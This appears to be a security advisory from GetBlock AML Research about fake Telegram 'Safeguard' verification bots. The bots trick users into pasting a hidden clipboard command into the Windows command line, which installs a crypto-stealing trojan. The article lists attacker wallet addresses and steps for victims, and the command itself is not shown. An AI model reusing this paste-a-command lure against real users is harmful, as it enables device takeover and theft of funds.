How to lose your cryptocurrency in Telegram in two minutes? Anyone can become a victim

Hackers have come up with a new way to steal cryptocurrencies from users’ devices using fake security bots in Telegram. Attackers create scripts that encourage users to use a malicious “Safeguard” bot. GetBlock AML Research explains how hackers can gain access to your cryptocurrency using Telegram.

How do they trap you?

The most popular ways to “get” a victim to use a malicious bot are to conduct fake airdrops or create a fake Telegram page of a popular crypto influencer. When attempting to get free tokens or to follow an influencer, the user is faced with the need to pass verification through Safeguard bot.

One of the phishing groups under the guise of conducting an airdrop

Point of no return

Fake Safeguard bot to pass identification

All malicious functionality is implemented in the Safeguard bot. When trying to open it and pass automatic verification, the user will encounter an error and will have to resort to manual identification. The bot will inform you that you need to open the Windows command line, press the Control (CTRL) + V key combination and press Enter.

A dialog box that copies a malicious command to the clipboard

Important: the moment the user sees this dialog box, a malicious command has already been copied to the clipboard. When run in the command line, it infects the device with a special trojan to steal cryptocurrencies and the victim’s Telegram account. Therefore, under no circumstances should you perform the actions described in the dialog box.

A malicious command to infect a device that is copied to the clipboard

If infected with a trojan, attackers gain full remote access to the victim’s device and all confidential data, including accounts and private keys of crypto wallets. The detailed functionality of such Trojans has been deconstructed by white-hat hacker Jose’s.

Attackers use social networks, particularly X, and celebrity accounts to promote malicious bots in Telegram. For example, links to the use of the Safeguard bot can be found in comments on US President Donald Trump’s publications.

Trump’s fake meme coin airdrop on X

On-chain analysis

The addresses of the hackers found during malware research indicate that they managed to steal $1,2 million worth of cryptocurrency. The assets were sent to Binance, HTX, FixedFloat, ChangeNow, eXch, and Cryptomus exchanges for laundering.

Attackers’ addresses:

• HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV
• 2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W
• D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R
• 0x21B681C98ebc32A9C6696003fc4050F63bc8b2C6

What to do if the device is infected

If all the hackers’ instructions have been followed, then you need to quickly follow these steps:

1. Find another device that has not been affected by the attackers;
2. Use this device to transfer cryptocurrency from current wallets to new ones;
3. End active sessions of all accounts, change their passwords, and enable two-factor authentication (2FA);
4. Install antivirus software on the infected device and run a full scan;
5. After detecting and removing the trojan, reinstall the operating system.

This algorithm does not guarantee full protection from attackers, but it can prevent them from taking over your assets and accounts.